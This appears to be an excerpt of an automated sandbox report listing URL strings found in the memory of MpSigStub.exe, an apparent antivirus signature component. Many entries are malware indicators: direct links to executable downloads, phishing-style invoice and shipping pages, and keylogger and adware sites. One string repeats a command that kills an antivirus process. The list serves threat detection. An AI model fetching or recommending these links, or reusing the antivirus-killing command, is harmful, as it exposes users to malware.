Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.funxy.biz/freevideos/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyedit.cn/MainDll/SoftSize.asp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyedit.cn/MainDll/SoftSize.aspFind
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyhappy.cn/MainDll/SoftSize.asp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyhappy.cn/MainDll/SoftSize.aspFind
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.menkee.info/wma.php
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/utils/product_cd_key_viewer.html
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.p2ptips.com/cgi-bin/kpop3.pl
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-fix-booster.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-fix-cleaner.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pdefender2009.com/buy.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.peertracking.com/track/
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.plattemedia.com/links/site
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.platteregistrations.com/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/a
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.playmoviesx.com/go/?a=
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.protectedmedia.com/licenseacquisition.asp
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.public.health.wa.gov.au/3/1428/2/apply_to_install_a_wastewater_system.pm
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.remarkablesongslive.com
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
